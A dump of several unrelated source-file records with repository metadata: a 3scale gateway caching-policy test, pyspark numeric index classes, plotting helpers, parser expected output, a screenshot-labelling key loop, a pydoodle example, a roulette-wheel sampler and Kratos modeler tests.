] | 5 | 2021-11-04T14:09:24.000Z | 2021-12-23T13:48:36.000Z | testsuite/tests/apicast/policy/caching/test_caching_policy_allow.py | dlaso99/3scale-tests | b31a3b3596af6d632b393e383c0417ea56bd95ca | [
"Apache-2.0"
] | 41 | 2021-11-03T14:27:21.000Z | 2022-03-29T14:46:16.000Z | testsuite/tests/apicast/policy/caching/test_caching_policy_allow.py | dlaso99/3scale-tests | b31a3b3596af6d632b393e383c0417ea56bd95ca | [
"Apache-2.0"
] | 12 | 2021-11-03T17:28:31.000Z | 2021-11-30T12:28:25.000Z | """
Rewrite spec/functional_specs/policies/caching/caching_allow_policy_spec.rb
"""
import pytest
from testsuite import rawobj
from testsuite.capabilities import Capability
@pytest.fixture(scope="module")
def policy_settings():
    "Add caching policy configured as 'caching_type': 'allow'"
    # Module scope: the policy is configured once and shared by every test here.
    return rawobj.PolicyConfig("caching", {"caching_type": "allow"})
@pytest.mark.required_capabilities(Capability.SCALING)
def test_caching_policy_allow(prod_client, openshift, application):
    """
    Test caching policy with caching mode set to Allow
    To cache credentials:
    - make request to production gateway with valid credentials
    - make request to production gateway with invalid credentials
    Scale backend-listener down
    Test if:
    - response with valid credentials have status_code == 200
    - response with same invalid credentials as before have status_code == 403
    - response with new invalid credentials have status_code == 200
    Scale backend-listener up to old value
    """
    client = prod_client()
    # Drop the client's default auth so each request supplies credentials
    # explicitly.
    client.auth = None
    auth = application.authobj()
    # Prime the gateway cache while the backend is still up: one known-good
    # and one known-bad credential.
    response = client.get("/", auth=auth)
    assert response.status_code == 200
    response = client.get("/", params={"user_key": ":user_key"})
    assert response.status_code == 403
    # With the backend scaled to zero, the gateway must answer from its cache;
    # scaling is restored automatically when the context manager exits.
    with openshift().scaler.scale("backend-listener", 0):
        # Test if response succeed on production calls with valid credentials
        for _ in range(3):
            response = client.get("/", auth=auth)
            assert response.status_code == 200
        # Test if response fail on production calls with known invalid credentials
        for _ in range(3):
            response = client.get("/", params={"user_key": ":user_key"})
            assert response.status_code == 403
        # Test if response succeed on production calls with unknown invalid credentials
        # ("allow" mode admits credentials it has never seen while the backend is down)
        for _ in range(3):
            response = client.get("/", params={"user_key": ":123"})
            assert response.status_code == 200
| 36.178571 | 87 | 0.685094 | """
Rewrite spec/functional_specs/policies/caching/caching_allow_policy_spec.rb
"""
import pytest
from testsuite import rawobj
from testsuite.capabilities import Capability
@pytest.fixture(scope="module")
def policy_settings():
    "Add caching policy configured as 'caching_type': 'allow'"
    # Module scope: the policy is configured once and shared by every test here.
    return rawobj.PolicyConfig("caching", {"caching_type": "allow"})
@pytest.mark.required_capabilities(Capability.SCALING)
def test_caching_policy_allow(prod_client, openshift, application):
    """
    Test caching policy with caching mode set to Allow
    To cache credentials:
    - make request to production gateway with valid credentials
    - make request to production gateway with invalid credentials
    Scale backend-listener down
    Test if:
    - response with valid credentials have status_code == 200
    - response with same invalid credentials as before have status_code == 403
    - response with new invalid credentials have status_code == 200
    Scale backend-listener up to old value
    """
    client = prod_client()
    # Drop the client's default auth so each request supplies credentials
    # explicitly.
    client.auth = None
    auth = application.authobj()
    # Prime the gateway cache while the backend is still up: one known-good
    # and one known-bad credential.
    response = client.get("/", auth=auth)
    assert response.status_code == 200
    response = client.get("/", params={"user_key": ":user_key"})
    assert response.status_code == 403
    # With the backend scaled to zero, the gateway must answer from its cache;
    # scaling is restored automatically when the context manager exits.
    with openshift().scaler.scale("backend-listener", 0):
        # Test if response succeed on production calls with valid credentials
        for _ in range(3):
            response = client.get("/", auth=auth)
            assert response.status_code == 200
        # Test if response fail on production calls with known invalid credentials
        for _ in range(3):
            response = client.get("/", params={"user_key": ":user_key"})
            assert response.status_code == 403
        # Test if response succeed on production calls with unknown invalid credentials
        # ("allow" mode admits credentials it has never seen while the backend is down)
        for _ in range(3):
            response = client.get("/", params={"user_key": ":123"})
            assert response.status_code == 200
| 0 | 0 | 0 |
ceb1b9eef7aadc583f322e87617783f52bf1e3a2 | 5,475 | py | Python | python/pyspark/pandas/indexes/numeric.py | akhalymon-cv/spark | 76191b9151b6a7804f8894e53eef74106f98b787 | [
"Apache-2.0"
] | 35,083 | 2015-01-01T03:05:13.000Z | 2022-03-31T21:57:40.000Z | python/pyspark/pandas/indexes/numeric.py | akhalymon-cv/spark | 76191b9151b6a7804f8894e53eef74106f98b787 | [
"Apache-2.0"
] | 32,117 | 2015-01-01T00:00:24.000Z | 2022-03-31T23:54:58.000Z | python/pyspark/pandas/indexes/numeric.py | akhalymon-cv/spark | 76191b9151b6a7804f8894e53eef74106f98b787 | [
"Apache-2.0"
] | 29,687 | 2015-01-01T02:40:43.000Z | 2022-03-31T16:49:33.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Optional, Union, cast
import pandas as pd
from pandas.api.types import is_hashable
from pyspark import pandas as ps
from pyspark.pandas._typing import Dtype, Name
from pyspark.pandas.indexes.base import Index
from pyspark.pandas.series import Series
class NumericIndex(Index):
    """
    Provide numeric type operations.
    This is an abstract class.
    """
    # Abstract marker base for the concrete numeric index types below.
    pass
class IntegerIndex(NumericIndex):
    """
    This is an abstract class for Int64Index.
    """
    # Abstract marker base; only Int64Index derives from it.
    pass
class Int64Index(IntegerIndex):
    """
    Immutable sequence used for indexing and alignment. The basic object
    storing axis labels for all pandas objects. Int64Index is a special case
    of `Index` with purely integer labels.
    Parameters
    ----------
    data : array-like (1-dimensional)
    dtype : NumPy dtype (default: int64)
    copy : bool
        Make a copy of input ndarray.
    name : object
        Name to be stored in the index.
    See Also
    --------
    Index : The base pandas-on-Spark Index type.
    Float64Index : A special case of :class:`Index` with purely float labels.
    Notes
    -----
    An Index instance can **only** contain hashable objects.
    Examples
    --------
    >>> ps.Int64Index([1, 2, 3])
    Int64Index([1, 2, 3], dtype='int64')
    From a Series:
    >>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
    >>> ps.Int64Index(s)
    Int64Index([1, 2, 3], dtype='int64')
    From an Index:
    >>> idx = ps.Index([1, 2, 3])
    >>> ps.Int64Index(idx)
    Int64Index([1, 2, 3], dtype='int64')
    """
    # No members are defined in this variant beyond what the bases provide.
class Float64Index(NumericIndex):
    """
    Immutable sequence used for indexing and alignment. The basic object
    storing axis labels for all pandas objects. Float64Index is a special case
    of `Index` with purely float labels.
    Parameters
    ----------
    data : array-like (1-dimensional)
    dtype : NumPy dtype (default: float64)
    copy : bool
        Make a copy of input ndarray.
    name : object
        Name to be stored in the index.
    See Also
    --------
    Index : The base pandas-on-Spark Index type.
    Int64Index : A special case of :class:`Index` with purely integer labels.
    Notes
    -----
    An Index instance can **only** contain hashable objects.
    Examples
    --------
    >>> ps.Float64Index([1.0, 2.0, 3.0])
    Float64Index([1.0, 2.0, 3.0], dtype='float64')
    From a Series:
    >>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
    >>> ps.Float64Index(s)
    Float64Index([1.0, 2.0, 3.0], dtype='float64')
    From an Index:
    >>> idx = ps.Index([1, 2, 3])
    >>> ps.Float64Index(idx)
    Float64Index([1.0, 2.0, 3.0], dtype='float64')
    """
    # No members are defined in this variant beyond what the bases provide.
if __name__ == "__main__":
_test()
| 27.651515 | 99 | 0.628493 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Optional, Union, cast
import pandas as pd
from pandas.api.types import is_hashable
from pyspark import pandas as ps
from pyspark.pandas._typing import Dtype, Name
from pyspark.pandas.indexes.base import Index
from pyspark.pandas.series import Series
class NumericIndex(Index):
    """
    Provide numeric type operations.
    This is an abstract class.
    """
    # Abstract marker base for Int64Index / Float64Index below.
    pass
class IntegerIndex(NumericIndex):
    """
    This is an abstract class for Int64Index.
    """
    # Abstract marker base; only Int64Index derives from it.
    pass
class Int64Index(IntegerIndex):
    """
    Immutable sequence used for indexing and alignment. The basic object
    storing axis labels for all pandas objects. Int64Index is a special case
    of `Index` with purely integer labels.
    Parameters
    ----------
    data : array-like (1-dimensional)
    dtype : NumPy dtype (default: int64)
    copy : bool
        Make a copy of input ndarray.
    name : object
        Name to be stored in the index.
    See Also
    --------
    Index : The base pandas-on-Spark Index type.
    Float64Index : A special case of :class:`Index` with purely float labels.
    Notes
    -----
    An Index instance can **only** contain hashable objects.
    Examples
    --------
    >>> ps.Int64Index([1, 2, 3])
    Int64Index([1, 2, 3], dtype='int64')
    From a Series:
    >>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
    >>> ps.Int64Index(s)
    Int64Index([1, 2, 3], dtype='int64')
    From an Index:
    >>> idx = ps.Index([1, 2, 3])
    >>> ps.Int64Index(idx)
    Int64Index([1, 2, 3], dtype='int64')
    """
    def __new__(
        cls,
        data: Optional[Any] = None,
        dtype: Optional[Union[str, Dtype]] = None,
        copy: bool = False,
        name: Optional[Name] = None,
    ) -> "Int64Index":
        # Index names must be hashable, matching pandas' contract.
        if not is_hashable(name):
            raise TypeError("Index.name must be a hashable type")
        if isinstance(data, (Series, Index)):
            # Already pandas-on-Spark data: route through the generic Index
            # factory, defaulting the dtype to int64.
            if dtype is None:
                dtype = "int64"
            return cast(Int64Index, Index(data, dtype=dtype, copy=copy, name=name))
        # Local (driver-side) data: build a pandas Int64Index first, then
        # convert it to a pandas-on-Spark index.
        return cast(
            Int64Index, ps.from_pandas(pd.Int64Index(data=data, dtype=dtype, copy=copy, name=name))
        )
class Float64Index(NumericIndex):
    """
    Immutable sequence used for indexing and alignment. The basic object
    storing axis labels for all pandas objects. Float64Index is a special case
    of `Index` with purely float labels.
    Parameters
    ----------
    data : array-like (1-dimensional)
    dtype : NumPy dtype (default: float64)
    copy : bool
        Make a copy of input ndarray.
    name : object
        Name to be stored in the index.
    See Also
    --------
    Index : The base pandas-on-Spark Index type.
    Int64Index : A special case of :class:`Index` with purely integer labels.
    Notes
    -----
    An Index instance can **only** contain hashable objects.
    Examples
    --------
    >>> ps.Float64Index([1.0, 2.0, 3.0])
    Float64Index([1.0, 2.0, 3.0], dtype='float64')
    From a Series:
    >>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
    >>> ps.Float64Index(s)
    Float64Index([1.0, 2.0, 3.0], dtype='float64')
    From an Index:
    >>> idx = ps.Index([1, 2, 3])
    >>> ps.Float64Index(idx)
    Float64Index([1.0, 2.0, 3.0], dtype='float64')
    """
    def __new__(
        cls,
        data: Optional[Any] = None,
        dtype: Optional[Union[str, Dtype]] = None,
        copy: bool = False,
        name: Optional[Name] = None,
    ) -> "Float64Index":
        # Index names must be hashable, matching pandas' contract.
        if not is_hashable(name):
            raise TypeError("Index.name must be a hashable type")
        if isinstance(data, (Series, Index)):
            # Already pandas-on-Spark data: route through the generic Index
            # factory, defaulting the dtype to float64.
            if dtype is None:
                dtype = "float64"
            return cast(Float64Index, Index(data, dtype=dtype, copy=copy, name=name))
        # Local (driver-side) data: build a pandas Float64Index first, then
        # convert it to a pandas-on-Spark index.
        return cast(
            Float64Index,
            ps.from_pandas(pd.Float64Index(data=data, dtype=dtype, copy=copy, name=name)),
        )
def _test() -> None:
    """Run this module's doctests against a local Spark session; exit nonzero on failure."""
    import os
    import doctest
    import sys
    from pyspark.sql import SparkSession
    import pyspark.pandas.indexes.numeric
    os.chdir(os.environ["SPARK_HOME"])
    # The doctests reference `ps`, so inject it into the execution globals.
    globs = pyspark.pandas.indexes.numeric.__dict__.copy()
    globs["ps"] = pyspark.pandas
    spark = (
        SparkSession.builder.master("local[4]")
        .appName("pyspark.pandas.indexes.numeric tests")
        .getOrCreate()
    )
    (failure_count, test_count) = doctest.testmod(
        pyspark.pandas.indexes.numeric,
        globs=globs,
        optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,
    )
    spark.stop()
    # Propagate doctest failures as a nonzero process exit code.
    if failure_count:
        sys.exit(-1)
if __name__ == "__main__":
_test()
| 1,889 | 0 | 77 |
2357e757eeab0c39ba22803f30a4f577979d9970 | 2,010 | py | Python | common/func_plots.py | jdvelasq/demand-forecast-using-time-series-clustering | 5d08f225076dbd370944202143e85e46a8962655 | [
"MIT"
] | null | null | null | common/func_plots.py | jdvelasq/demand-forecast-using-time-series-clustering | 5d08f225076dbd370944202143e85e46a8962655 | [
"MIT"
] | null | null | null | common/func_plots.py | jdvelasq/demand-forecast-using-time-series-clustering | 5d08f225076dbd370944202143e85e46a8962655 | [
"MIT"
] | 1 | 2021-07-17T19:28:24.000Z | 2021-07-17T19:28:24.000Z | from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
__author__ = "Jose Fernando Montoya Cardona"
__credits__ = ["Jose Fernando Montoya Cardona"]
__email__ = "jomontoyac@unal.edu.co"
| 36.545455 | 110 | 0.681592 | from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
__author__ = "Jose Fernando Montoya Cardona"
__credits__ = ["Jose Fernando Montoya Cardona"]
__email__ = "jomontoyac@unal.edu.co"
def get_plot_pca(ev):
(figure, ax) = plt.subplots(figsize=(10, 6))
ax.plot(ev['n_components'], ev['Cum_explained_variance'], '--')
ax.set_title("Varianza explicada por componente", fontsize=15)
ax.set_xlabel('Número de componentes', fontsize=15)
ax.set_ylabel('Varianza acumulada', fontsize=15)
plt.show()
def get_plot_n_dim_to_two_dim(m_features, labels):
x_embedded = TSNE(n_components=2).fit_transform(m_features)
df_x_embedded = pd.DataFrame([x_embedded[:, 0], x_embedded[:, 1], labels]).transpose()
df_x_embedded.columns = ['X1', 'X2', 'y']
df_x_embedded.plot.scatter(x='X1', y='X2', c='y', colormap='tab10', figsize=(20, 10), legend=True)
plt.show()
def get_plot_line(df_dem, idx_date=False):
(figure, ax) = plt.subplots(figsize=(25, 5))
if idx_date:
df_dem.plot(ax=ax)
else:
df_dem.reset_index(drop=True).plot(ax=ax)
plt.show()
def get_plot_acf_pacf(data, cod_or=None, type_day=None, n_lags=24*20, v_alpha=0.05, w_diff=False, num_diff=1):
    """Plot the autocorrelation function (ACF) of a series.

    Parameters
    ----------
    data : pandas.Series
        Series to analyse; its ``name`` attribute is used in the plot title.
    cod_or : str, optional
        Origin code shown in the title (empty string when omitted).
    type_day : str, optional
        Day-type label shown in the title (empty string when omitted).
    n_lags : int
        Number of lags to display (default: 20 days of hourly data).
    v_alpha : float
        Alpha for the ACF confidence intervals.
    w_diff : bool
        When True, difference the series ``num_diff`` times before plotting.
    num_diff : int
        Number of differencing passes applied when ``w_diff`` is True.
    """
    if w_diff:
        # Each differencing pass introduces a leading NaN; drop it before
        # the next pass so successive differences stay aligned.
        for _ in range(num_diff):
            data = data.diff(periods=1)
            data = data[~np.isnan(data)]
    data = data[~np.isnan(data)]
    figure1, ax1 = plt.subplots(figsize=(22, 11))
    plot_acf(data, lags=n_lags, alpha=v_alpha, ax=ax1)
    # Fall back to '' so the None defaults cannot crash the title
    # concatenation (str + None raises TypeError in the original code).
    ax1.set_title('ACF-' + (cod_or or '') + '-' + (type_day or '')
                  + '_cluster_number-' + str(data.name))
    plt.show()
    # NOTE: a PACF plot (plot_pacf) used to exist here but was disabled
    # upstream; re-add it if partial autocorrelations are needed again.
| 1,575 | 0 | 92 |
4855f833b139d223b0bf8bfee33e39906051e030 | 952 | py | Python | src/genie/libs/parser/iosxe/tests/ShowStackPower/cli/equal/golden_output_c3850_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowStackPower/cli/equal/golden_output_c3850_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowStackPower/cli/equal/golden_output_c3850_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"power_stack": {
"Powerstack-1": {
"switch_num": 1,
"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-12": {
"switch_num": 1,
"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-11": {
"switch_num": 1,
"allocated_power": 295,
"topology": "Stndaln",
"unused_power": 390,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
}
}
| 27.2 | 35 | 0.423319 | expected_output = {
"power_stack": {
"Powerstack-1": {
"switch_num": 1,
"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-12": {
"switch_num": 1,
"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-11": {
"switch_num": 1,
"allocated_power": 295,
"topology": "Stndaln",
"unused_power": 390,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
}
}
| 0 | 0 | 0 |
d1bd8f9d238d2aa19bb05482a8ad5ba9649d115d | 630 | py | Python | tests/sample/climate_sample_test.py | south-coast-science/scs_core | 81ad4010abb37ca935f3a31ac805639ef53b1bcf | [
"MIT"
] | 3 | 2019-03-12T01:59:58.000Z | 2020-09-12T07:27:42.000Z | tests/sample/climate_sample_test.py | south-coast-science/scs_core | 81ad4010abb37ca935f3a31ac805639ef53b1bcf | [
"MIT"
] | 1 | 2018-04-20T07:58:38.000Z | 2021-03-27T08:52:45.000Z | tests/sample/climate_sample_test.py | south-coast-science/scs_core | 81ad4010abb37ca935f3a31ac805639ef53b1bcf | [
"MIT"
] | 4 | 2017-09-29T13:08:43.000Z | 2019-10-09T09:13:58.000Z | #!/usr/bin/env python3
"""
Created on 16 Nov 2020
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import json
from scs_core.data.json import JSONify
from scs_core.sample.climate_sample import ClimateSample
# --------------------------------------------------------------------------------------------------------------------
# run...
jstr = '{"tag": "scs-ap1-6", "rec": "2019-01-22T13:55:54Z", "val": {"hmd": 49.3, "tmp": 21.5, "bar": {"pA": 99.8}}}'
print(jstr)
print("-")
jdict = json.loads(jstr)
sample = ClimateSample.construct_from_jdict(jdict)
print(sample)
print("-")
print(JSONify.dumps(sample))
| 21 | 118 | 0.555556 | #!/usr/bin/env python3
"""
Created on 16 Nov 2020
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import json
from scs_core.data.json import JSONify
from scs_core.sample.climate_sample import ClimateSample
# --------------------------------------------------------------------------------------------------------------------
# run...
jstr = '{"tag": "scs-ap1-6", "rec": "2019-01-22T13:55:54Z", "val": {"hmd": 49.3, "tmp": 21.5, "bar": {"pA": 99.8}}}'
print(jstr)
print("-")
jdict = json.loads(jstr)
sample = ClimateSample.construct_from_jdict(jdict)
print(sample)
print("-")
print(JSONify.dumps(sample))
| 0 | 0 | 0 |
0bedc3e831ab7fb8bdaaae07208c05d1cd94b9d2 | 680 | py | Python | classifier.py | monkey-cli/monkey-trainer | 50ad34f1ace21ac4435806c3521e4cab5e16c540 | [
"MIT"
] | null | null | null | classifier.py | monkey-cli/monkey-trainer | 50ad34f1ace21ac4435806c3521e4cab5e16c540 | [
"MIT"
] | 1 | 2021-02-12T18:57:24.000Z | 2021-02-12T18:58:15.000Z | classifier.py | monkey-cli/monkey-trainer | 50ad34f1ace21ac4435806c3521e4cab5e16c540 | [
"MIT"
] | null | null | null | import cv2
import subprocess
imageURI = "dummy.png"
image = cv2.imread(imageURI)
cv2.imshow("Focus window", image)
# Device type, simple check
isIOS = True
scriptPath = None
if isIOS:
scriptPath = "./monkey-scripts/monkey-screenshot-ios.sh"
else:
scriptPath = "./monkey-scripts/monkey-screenshot-android.sh"
while True:
key = cv2.waitKey(1)
if key == ord("q"):
print("EXIT!")
break
elif key == ord("p"):
print("Store positive: ")
subprocess.run('bash %s positive' % (scriptPath), shell=True)
elif key == ord("n"):
print("Store negative: ")
subprocess.run('bash %s negative' % (scriptPath), shell=True)
| 22.666667 | 69 | 0.630882 | import cv2
import subprocess
# Show a placeholder image so OpenCV owns a focused window that can
# receive the key presses polled below.
imageURI = "dummy.png"
image = cv2.imread(imageURI)
cv2.imshow("Focus window", image)
# Device type, simple check
isIOS = True
scriptPath = None
if isIOS:
    scriptPath = "./monkey-scripts/monkey-screenshot-ios.sh"
else:
    scriptPath = "./monkey-scripts/monkey-screenshot-android.sh"
# Key loop: 'q' quits; 'p'/'n' run the platform shell script to store a
# positively/negatively labelled screenshot.
while True:
    key = cv2.waitKey(1)
    if key == ord("q"):
        print("EXIT!")
        break
    elif key == ord("p"):
        print("Store positive: ")
        # NOTE(review): shell=True with %-interpolation is shell-injection
        # prone if scriptPath ever becomes user-controlled -- prefer
        # subprocess.run(["bash", scriptPath, "positive"]).
        subprocess.run('bash %s positive' % (scriptPath), shell=True)
    elif key == ord("n"):
        print("Store negative: ")
        subprocess.run('bash %s negative' % (scriptPath), shell=True)
| 0 | 0 | 0 |
f913182b513ae01ec8491113fe37ccedc418d446 | 363 | py | Python | examples/example_stdIn.py | Prince2347X/pydoodle | c5dbf5c43eb120eed45a44a8de30848b271eb1b2 | [
"MIT"
] | 11 | 2021-04-05T07:33:32.000Z | 2021-11-21T16:50:59.000Z | examples/example_stdIn.py | Prince2347X/pydoodle | c5dbf5c43eb120eed45a44a8de30848b271eb1b2 | [
"MIT"
] | null | null | null | examples/example_stdIn.py | Prince2347X/pydoodle | c5dbf5c43eb120eed45a44a8de30848b271eb1b2 | [
"MIT"
] | 3 | 2021-05-03T13:53:58.000Z | 2021-06-26T05:11:50.000Z | import pydoodle
c = pydoodle.Compiler(clientId="client-id",
clientSecret="client-secret")
with open(file="test2.py") as f:
script = f.read()
f.close()
result = c.execute(script=script, language="python3",
stdIn="1st Input ||2nd Input") # Double pipe(||) is used to separate multiple inputs.
print(result.output)
| 33 | 105 | 0.630854 | import pydoodle
# Build a pydoodle compiler client; replace the placeholders with real
# JDoodle API credentials before running.
c = pydoodle.Compiler(clientId="client-id",
                      clientSecret="client-secret")
# Read the script to execute from disk.
with open(file="test2.py") as f:
    script = f.read()
    f.close()  # NOTE(review): redundant -- the ``with`` block already closes f
result = c.execute(script=script, language="python3",
                   stdIn="1st Input ||2nd Input") # Double pipe(||) is used to separate multiple inputs.
print(result.output)
| 0 | 0 | 0 |
2d08d8891b2a537c867a0fe586168d7a88dacc35 | 484 | py | Python | bdcloud_paper/python_prototype/samplers.py | rnowling/bigpetstore-data-generator | fae5a4a84343d06545ebed77be35bc527d625ad7 | [
"Apache-2.0"
] | 6 | 2015-04-08T02:56:41.000Z | 2021-05-26T15:21:17.000Z | bdcloud_paper/python_prototype/samplers.py | rnowling/bigpetstore-data-generator | fae5a4a84343d06545ebed77be35bc527d625ad7 | [
"Apache-2.0"
] | 8 | 2015-01-10T02:02:49.000Z | 2015-02-12T15:27:44.000Z | bdcloud_paper/python_prototype/samplers.py | rnowling/bigpetstore-data-generator | fae5a4a84343d06545ebed77be35bc527d625ad7 | [
"Apache-2.0"
] | 5 | 2015-08-30T19:56:42.000Z | 2018-12-30T22:16:35.000Z | import random
| 25.473684 | 54 | 0.528926 | import random
class RouletteWheelSampler(object):
    """Draw values at random according to a discrete probability distribution.

    ``values`` is an iterable of ``(value, weight)`` pairs whose weights are
    expected to sum to 1.0.  Construction builds a cumulative-weight "wheel"
    once; each draw walks it with a single uniform random number.
    """

    def __init__(self, values):
        self._wheel = []
        cumulative = 0.0
        for value, weight in values:
            cumulative += weight
            self._wheel.append((cumulative, value))

    def sample(self):
        """Return one value, chosen with probability proportional to its weight."""
        r = random.random()
        for threshold, value in self._wheel:
            if r <= threshold:
                return value
        # We should only get here if the weights do not quite sum to 1.0.
        # Guard against floating-point round-off leaving the final
        # threshold slightly below r by returning the last slot.
        if self._wheel:
            return self._wheel[-1][1]
        # Original code used Python-2 `raise Exception, "..."` syntax,
        # which is a SyntaxError under Python 3.
        raise Exception("Could not pick a value!")
| 380 | 14 | 76 |
b39c4cdcb731753ed352c502c1d23118d2de8c0b | 3,231 | py | Python | kratos/tests/test_delete_model_parts_modeler.py | hbayraktaroglu/Kratos | 6b71869ca7adb36a798e0cb11b34287fdc482590 | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_delete_model_parts_modeler.py | hbayraktaroglu/Kratos | 6b71869ca7adb36a798e0cb11b34287fdc482590 | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_delete_model_parts_modeler.py | hbayraktaroglu/Kratos | 6b71869ca7adb36a798e0cb11b34287fdc482590 | [
"BSD-4-Clause"
] | null | null | null | # Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
from KratosMultiphysics.modelers.delete_model_parts_modeler import DeleteModelPartsModeler
if __name__ == '__main__':
KratosMultiphysics.Logger.GetDefaultOutput().SetSeverity(KratosMultiphysics.Logger.Severity.WARNING)
KratosUnittest.main() | 46.826087 | 105 | 0.7264 | # Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
from KratosMultiphysics.modelers.delete_model_parts_modeler import DeleteModelPartsModeler
class TestDeleteModelPartModeler(KratosUnittest.TestCase):
    """Checks that DeleteModelPartsModeler removes exactly the named model parts."""

    def testDeleteModelPartModelerOneModelPart(self):
        """A single root model part is deleted while its sibling survives."""
        # Minimal model with two root model parts
        current_model = KratosMultiphysics.Model()
        current_model.CreateModelPart("ModelPart1")
        current_model.CreateModelPart("ModelPart2")
        # Ask the modeler to delete only "ModelPart2"
        modeler_settings = KratosMultiphysics.Parameters('''{
            "model_part_names" : ["ModelPart2"]
        }''')
        modeler = DeleteModelPartsModeler(current_model, modeler_settings)
        # Run the complete modeler pipeline
        modeler.SetupGeometryModel()
        modeler.PrepareGeometryModel()
        modeler.SetupModelPart()
        # Only the requested model part may be gone
        self.assertTrue(current_model.HasModelPart("ModelPart1"))
        self.assertFalse(current_model.HasModelPart("ModelPart2"))

    def testDeleteModelPartModelerMultipleModelParts(self):
        """Several (nested) model part names are processed in one pass."""
        # Build a two-tree hierarchy of model parts
        current_model = KratosMultiphysics.Model()
        root_1 = current_model.CreateModelPart("ModelPart1")
        sub_11 = root_1.CreateSubModelPart("SubModelPart11")
        sub_112 = sub_11.CreateSubModelPart("SubModelPart112")
        sub_112.CreateSubModelPart("SubModelPart1121")
        sub_112.CreateSubModelPart("SubModelPart1122")
        root_2 = current_model.CreateModelPart("ModelPart2")
        root_2.CreateSubModelPart("SubModelPart21")
        sub_22 = root_2.CreateSubModelPart("SubModelPart22")
        sub_221 = sub_22.CreateSubModelPart("SubModelPart221")
        sub_221.CreateSubModelPart("SubModelPart2211")
        modeler_settings = KratosMultiphysics.Parameters('''{
            "echo_level" : 2,
            "model_part_names" : [
                "ModelPart1.SubModelPart11",
                "ModelPart1.SubModelPart11.SubModelPart112",
                "ModelPart2.SubModelPart22.SubModelPart221.SubModelPart2211",
                "ModelPart2.SubModelPart21",
                "ModelPart1"]
        }''')
        modeler = DeleteModelPartsModeler(current_model, modeler_settings)
        # Run the complete modeler pipeline
        modeler.SetupGeometryModel()
        modeler.PrepareGeometryModel()
        modeler.SetupModelPart()
        # Check the resulting model part hierarchy
        for surviving_name in (
                "ModelPart2",
                "ModelPart2.SubModelPart22",
                "ModelPart2.SubModelPart22.SubModelPart221",
                "ModelPart2.SubModelPart22.SubModelPart221.SubModelPart2211"):
            self.assertTrue(current_model.HasModelPart(surviving_name))
        self.assertFalse(current_model.HasModelPart("ModelPart1"))
if __name__ == '__main__':
KratosMultiphysics.Logger.GetDefaultOutput().SetSeverity(KratosMultiphysics.Logger.Severity.WARNING)
KratosUnittest.main() | 2,753 | 37 | 76 |
64652ddca6102b9868aadc77bb15fee6c313ab7e | 548 | py | Python | angalabiri/shop/migrations/0004_productvariation_varation_type.py | dark-codr/ebiangala | 0af3de29b2afa71df3e138cd16ecddc69fbd597d | [
"MIT"
] | 1 | 2021-03-25T14:06:23.000Z | 2021-03-25T14:06:23.000Z | angalabiri/shop/migrations/0004_productvariation_varation_type.py | dark-codr/ebiangala | 0af3de29b2afa71df3e138cd16ecddc69fbd597d | [
"MIT"
